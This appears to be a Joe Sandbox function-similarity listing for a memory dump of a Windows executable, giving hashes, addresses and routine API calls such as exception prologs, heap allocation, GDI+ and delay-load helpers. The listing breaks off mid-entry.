Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: f98a5f887e2cdd7a8128ebdf9c4f0ccca3203f569da90448218bacfb319626dd
Instruction ID: 43349fb9e7a9cc8fc86a58fdcc175775ab3a7044579a1ae13ba57125caa7b984
Opcode Fuzzy Hash: f98a5f887e2cdd7a8128ebdf9c4f0ccca3203f569da90448218bacfb319626dd
Instruction Fuzzy Hash: 2E21A2B2E40616ABDB15DFB9EC41A6BB7A8FB14314F01063BF505EB781D7709D40C6A8

Function 003D9485 Relevance: 1.6, APIs: 1, Instructions: 71COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 003D948A

Part of subcall function 003C137E: __EH_prolog.LIBCMT ref: 003C1383
Part of subcall function 003C137E: new.LIBCMT ref: 003C13FB

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: c5e115c41ee30d6e84c68d33dc495bf53b4d517447f61a0264b7dfee3e9a3305
Instruction ID: 40bb72823f2b5155ee4edc2e97877904fc9e824bdfd9749f9bcc358c36dddbbe
Opcode Fuzzy Hash: c5e115c41ee30d6e84c68d33dc495bf53b4d517447f61a0264b7dfee3e9a3305
Instruction Fuzzy Hash: 0A217F76D042599ACF12DF95E941AEEB7B5AF1A300F1004AFE809AB342D7356E05DF60

Function 003C90D0 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 003C90D5

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 236129a07f398023d6a4d8df9c001c9b1136bceadf62e566273a5780d2ad79ff
Instruction ID: a868f38d4f744bf1463007f7648003ed9355ff4c36b51262aea348406c84a6b2
Opcode Fuzzy Hash: 236129a07f398023d6a4d8df9c001c9b1136bceadf62e566273a5780d2ad79ff
Instruction Fuzzy Hash: 09118273910529ABCF13AE58CC96FDEB736BF48740F0A452AF815FB252CA318D1187A0

Function 003E59FC Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,003E23AA,?,0000015D,?,?,?,?,003E2F29,000000FF,00000000,?,?), ref: 003E5A2E

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 05674fc9bdc337eb4a2582644b7de9ae007f423345ecf40d76e3237191862fe7
Instruction ID: 4134e83c79642634e2491e58521a18e1d9f4fbd63e09f85e492463027baabcb4
Opcode Fuzzy Hash: 05674fc9bdc337eb4a2582644b7de9ae007f423345ecf40d76e3237191862fe7
Instruction Fuzzy Hash: D0E06535101AF46AE6332B679C4576A364CAF613ADF164334EC159A5D1DB60DC0081A5

Function 003C5B35 Relevance: 1.5, APIs: 1, Instructions: 32COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 003C5B3A

Part of subcall function 003CAC66: __EH_prolog.LIBCMT ref: 003CAC6B

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 73a5db2a8ee9dff753b018bfe8ece13d3ed2d3a05b3fc18a4307a1cbeaaf773c
Instruction ID: 048afdd268e640c7f97f200d678a08e481407a9180aaddbdb0f57e44a8f2ddbc
Opcode Fuzzy Hash: 73a5db2a8ee9dff753b018bfe8ece13d3ed2d3a05b3fc18a4307a1cbeaaf773c
Instruction Fuzzy Hash: E001D130900AC5DECB06E7A4C415BDDFBE4DF56304F14859EA85A97282DBB42F08D763

Function 003CA145 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 003CA174

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: d41f42441c78582addea9c79a43b618b79fd08bf7c31fc35724531417abc725e
Instruction ID: 81f6b8121855fa641e59ae6232e7d1d0dfad72a1258de5ed5b78924ab0d16305
Opcode Fuzzy Hash: d41f42441c78582addea9c79a43b618b79fd08bf7c31fc35724531417abc725e
Instruction Fuzzy Hash: B7F0E231408B80EECF236BB48805FDBBBA45F16335F048A0EF1FD86192C27518858723

Function 003C1E8E Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 003C1E93

Part of subcall function 003C18F6: __EH_prolog.LIBCMT ref: 003C18FB

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 74723ca16fa43aa54f414e693dc5fd2c93386e725a7095c7f8298d2877df534a
Instruction ID: 59096dfe75704ed787741e7a1981010ee96a262ff250b934007585637db19937
Opcode Fuzzy Hash: 74723ca16fa43aa54f414e693dc5fd2c93386e725a7095c7f8298d2877df534a
Instruction Fuzzy Hash: F0F0F8B1C102998ECF42EFA8C805BEEBBF1BB09300F0402BED409E7202E7344A04CB91

Function 003C1E93 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 003C1E93

Part of subcall function 003C18F6: __EH_prolog.LIBCMT ref: 003C18FB

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: e0ae847181b1538d67acaf3b877b1e0c0f52bda45648bd320df295aee16f3314
Instruction ID: fe934b80792783d7e5015e52a8996c8839dec70cc5f2775d2587a356cf1a7a06
Opcode Fuzzy Hash: e0ae847181b1538d67acaf3b877b1e0c0f52bda45648bd320df295aee16f3314
Instruction Fuzzy Hash: 2EF098B1C152998ECF51DFA8C845BEEBBF1BB19200F1441BED409E7202E7355A05CB95

Function 003CF8F2 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON

Download Yara Rule

APIs

SetThreadExecutionState.KERNEL32(00000001), ref: 003CF927

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: ExecutionStateThread
String ID:
API String ID: 2211380416-0
Opcode ID: 99444df6db68e78140b55ee0fb52f677d6a2eaf611f0c88ab16de8733efdaaad
Instruction ID: 79f656ceca712c0341302549933d1a19aaa2f61db7695a0a5c2c2ec54784cdb6
Opcode Fuzzy Hash: 99444df6db68e78140b55ee0fb52f677d6a2eaf611f0c88ab16de8733efdaaad
Instruction Fuzzy Hash: 1DD0125575415626DA1B3368790AFFD260B8FC6714F09007EB1059A3D3CA554C56D3A1

Function 003D8B65 Relevance: 1.5, APIs: 1, Instructions: 17memoryCOMMON

Download Yara Rule

APIs

GdipAlloc.GDIPLUS(00000010), ref: 003D8B6B

Part of subcall function 003D8924: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 003D8945

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: Gdip$AllocBitmapCreateFromStream
String ID:
API String ID: 1915507550-0
Opcode ID: 15c49645ae947bc9d886009c95b2f94d8af3cf3aba4b9e0e598e8e73a7603f1a
Instruction ID: 7e4cd812bd2e9112028cfbc7c05d795dd0d90656842fb02cf544240e60679013
Opcode Fuzzy Hash: 15c49645ae947bc9d886009c95b2f94d8af3cf3aba4b9e0e598e8e73a7603f1a
Instruction Fuzzy Hash: B0D0A77261010D7BDF826F61AC02E7D7AE9DB02350F504537BC0499350EE72EE10A251

Function 003C971A Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(000000FF,003C964C), ref: 003C9726

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 3399a7aadbd3e4445bcf047974f642ffe21c25209d99f3275d07277c18a87186
Instruction ID: 3ca8c7da326ef03b8237e29d9a278d42d9a244acdbb7c5a95c5e47a4d24c6ae9
Opcode Fuzzy Hash: 3399a7aadbd3e4445bcf047974f642ffe21c25209d99f3275d07277c18a87186
Instruction Fuzzy Hash: FDD01230033600D58F670E385D0DB656651AB433A6F2ADAEDE065C44A1CB22CC43F740

Function 003DBF77 Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON

Download Yara Rule

APIs

SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 003DBF9C

Part of subcall function 003D991E: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 003D992F
Part of subcall function 003D991E: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 003D9940
Part of subcall function 003D991E: TranslateMessage.USER32(?), ref: 003D994A
Part of subcall function 003D991E: DispatchMessageW.USER32(?), ref: 003D9954

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: Message$DispatchItemPeekSendTranslate
String ID:
API String ID: 4142818094-0
Opcode ID: a2ae2c2100d3e206ccdd172e1b6b26e894fce44bb7c8e1e08ce7e49beafb6a52
Instruction ID: b26abdc85292f520fbc5c6256b69a7b8028197db3af7e5ad754800819e519434
Opcode Fuzzy Hash: a2ae2c2100d3e206ccdd172e1b6b26e894fce44bb7c8e1e08ce7e49beafb6a52
Instruction Fuzzy Hash: 6CD09E72144300EAD6122B51DE06F1ABAA6BB88B04F004559B744740F2C6729D30EB06

Function 003DC726 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 003DC738

Part of subcall function 003DCABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003DCB39
Part of subcall function 003DCABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003DCB4A

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 9f67445b3375863889f208fdae97344cb958d6b1e43f2e6a4056c14fdb2a82b3
Instruction ID: b4743315bc1b00409883483926f8a506238bc7801bf1fa1c73afb7bdc317e5af
Opcode Fuzzy Hash: 9f67445b3375863889f208fdae97344cb958d6b1e43f2e6a4056c14fdb2a82b3
Instruction Fuzzy Hash: DBB012E727860B7C3D0B92403D42C37010CC0C0B24330555FF500D8340E8403C44C632

Function 003DC75F Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 003DC738

Part of subcall function 003DCABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003DCB39
Part of subcall function 003DCABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003DCB4A

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: eb37e7461816a23f34d43edb367200c80a5ecc1cf2be9e2133df32e78cd59d70
Instruction ID: d5179218928f0083a66cd2f2197b7ea26083c42c073e3c7e919d7a94b977f5f6
Opcode Fuzzy Hash: eb37e7461816a23f34d43edb367200c80a5ecc1cf2be9e2133df32e78cd59d70
Instruction Fuzzy Hash: BDB012D727860B7D394BD2043F02C37010CC0C0B14330541FF504C4340E8401C05C632

Function 003DC74B Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 003DC738

Part of subcall function 003DCABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003DCB39
Part of subcall function 003DCABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003DCB4A

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 4d9168f1129fbf244a4fc5c9b7f48f4de068babf8689a93d48c17fa8bc0de683
Instruction ID: 4fa32026bda7bcaf8cf588de72bc18770301e7cab9f1492e41a9bf51ce5e3ded
Opcode Fuzzy Hash: 4d9168f1129fbf244a4fc5c9b7f48f4de068babf8689a93d48c17fa8bc0de683
Instruction Fuzzy Hash: EAB012D727850B7C394BD2043D02C37010CC0C0B14330941FF904C4340E8401C04C632

Function 003DC741 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 003DC738

Part of subcall function 003DCABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003DCB39
Part of subcall function 003DCABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003DCB4A

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 49540c0cd07f4f4b34cab6eeca248e8f9148ae0556d40ea8b59b541f7d78b268
Instruction ID: ac4f545ccaab2bb7102dec6ed552ed5739e8184da71e607167b5374dc0d6df73
Opcode Fuzzy Hash: 49540c0cd07f4f4b34cab6eeca248e8f9148ae0556d40ea8b59b541f7d78b268
Instruction Fuzzy Hash: 92B012D727840B7C394BD2047D02C37010CC0C0B15330551FF505C4340E8401C04C232

Function 003DC7B6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 003DC799

Part of subcall function 003DCABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003DCB39
Part of subcall function 003DCABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003DCB4A

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 32495417aa1599822d797f27c36b14f42085d7c486466f1e24d9032dd2d46efc
Instruction ID: 5908e48782c5c99c6aee723b5ead591aa4abf70b8639ca66061e166a33940ea6
Opcode Fuzzy Hash: 32495417aa1599822d797f27c36b14f42085d7c486466f1e24d9032dd2d46efc
Instruction Fuzzy Hash: CFB092D627850A6D254B92052802C36010DC084B10330941BB504C4340E8801C40C136

Function 003DC787 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 003DC799

Part of subcall function 003DCABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003DCB39
